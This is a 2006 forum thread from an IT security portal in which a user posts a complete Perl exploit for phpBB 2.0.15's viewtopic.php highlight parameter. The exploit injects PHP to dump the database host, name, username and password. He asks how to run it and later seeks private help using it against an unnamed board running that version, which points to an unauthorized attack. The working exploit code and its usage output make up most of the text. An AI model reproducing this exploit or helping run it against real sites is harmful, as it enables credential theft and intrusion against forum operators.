|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 86
Members: 0
Total: 86
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
A quick Perl Tutorial please? |
|
Posted: Wed Apr 05, 2006 8:29 am |
|
|
Aryan-Husky |
Active user |
|
|
Joined: Apr 03, 2006 |
Posts: 37 |
|
|
|
|
|
|
|
Firstly im only learning Perl through what I can gather on Google and never intended on using it however I am playing around with this script for phpBB 2.0.15 and need help compiling it.
Quote: |
#!/usr/bin/perl
# tested and working /str0ke
# ********************************************************************
# **********************************************************************
# **** **
# *** ****** ******************* **
# *** *** **** *********************** **
# *** *** **** **** * *** ***** **
# *** *** *** *** *** * ** ** ** **
# *** *** *** ** ** ** ** **
#*** *** *** *** ** ** ***** **
#** *** *** **** ** ** ** **
#** *** *** *** ******* ******* ** *** ** **
#** *** *** *** ** *** *** ** ** ** ** **
#** *** *** *** ** *** *** *** ***** **
#** *** *** *** ** *** *** **
#** **** *** **** *** *** **
#** ******* **** ******** *********************************** **
#** *** **
#** *** **
#** **
#** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability **
#** This exploit gives the user all the details about the database **
#** connection such as database host, username, password and **
#** database name. **
#** **
#** Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005 **
#** **
#** Greetings to GvR, Jumento, PP, CKrew & friends **
#** **
#*****************************************************************************
# ***************************************************************************
use IO::Socket;
print "+-----------------------------------------------------------------------+\r\n";
print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n";
print "| By SecureD gvr.secured<AT>gmail<DOT>com |\r\n";
print "+-----------------------------------------------------------------------+\r\n";
if (@ARGV < 3)
{
print "Usage:\r\n";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
print "SERVER - Server where PhpBB is installed.\r\n";
print "DIR - PHPBB directory or / for no directory.\r\n";
print "THREADID - Id of an existing thread.\r\n";
print "COOKIESTRING - Optional, cookie string of the http request.\r\n";
print " Use this when a thread needs authentication for viewing\r\n";
print " You can use Firefox in combination with \"Live HTTP\r\n";
print " Headers\" to get this cookiestring.\r\n\r\n";
print "Example 1 (with cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
print "Example 2 (without cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
exit();
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$threadid = $ARGV[2];
$cookie = $ARGV[3];
$serv =~ s/http:\/\///ge;
$delimit = "GvRSecureD";
$sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\$dbpasswd.";
$sploit .= "$delimit).'";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[+] Connecting ... Could not connect to host.\n\n";
print "[+] Connecting OK\n";
sleep(1);
print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\r\n";
print $sock "Host: $serv\r\n";
if ( defined $cookie) {
print $sock "Cookie: $cookie \r\n";
}
print $sock "Connection: close\r\n\r\n";
$succes = 0;
while ($answer = <$sock>) {
$delimitIndex = index $answer, $delimit;
if ($delimitIndex >= 0) {
$succes = 1;
$urlIndex = index $answer, "href";
if ($urlIndex < 0){
$answer = substr($answer, length($delimit));
$length = 0;
while (length($answer) > 0) {
$nex = index($answer, $delimit);
if ($nex > 0) {
push(@array, substr($answer, 0, $nex));
$answer = substr($answer, $nex + length($delimit), length($answer));
} else {
$answer= "";
}
}
}
}
}
close($sock);
if ($succes == 1) {
print "OK\n";
sleep(1);
print "[+] Database Host: " . $array[0] . "\n";
sleep(1);
print "[+] Database Name: " . $array[1] . "\n";
sleep(1);
print "[+] Username: " . $array[2] . "\n";
sleep(1);
print "[+] Password: " . $array[3] . "\n";
sleep(1);
} else {
print "FAILED\n";
}
# milw0rm.com [2005-07-03]
|
I have Active Perl installed and I have the above text saved as exploit.pl
I can lauch it but I get this in return:
Quote: |
+-----------------------------------------------------------------------+
| PhpBB 2.0.15 Database Authentication Details Exploit |
| By SecureD gvr.secured<AT>gmail<DOT>com |
+-----------------------------------------------------------------------+
Usage:\r\n";
phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING
SERVER - Server where PhpBB is installed.
DIR - PHPBB directory or / for no directory.
THREADID - Id of an existing thread.
COOKIESTRING - Optional, cookie string of the http request.
Use this when a thread needs authentication for viewing
You can use Firefox in combination with \"Live HTTP
Headers\" to get this cookiestring.
Example 1 (with cookiestring):
phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid=10dae92b780914332896df43808c4e09\"
Example 2 (without cookiestring):
phpbbSecured.pl 192.168.168.123
|
Could somebody please tell me what the next step is?
Id be very gratefull, I think I need to enter my own information but Im not sure where.
Thanks again. |
|
|
|
|
|
|
|
|
Posted: Thu Apr 06, 2006 4:13 am |
|
|
Aryan-Husky |
Active user |
|
|
Joined: Apr 03, 2006 |
Posts: 37 |
|
|
|
|
|
|
|
I wont post the details of the board here but if someboddy could PM me and help me out with this I would be very gratefull.
The board is running phpBB 2.0.15
I just need help compiling perl.
Thanks. |
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|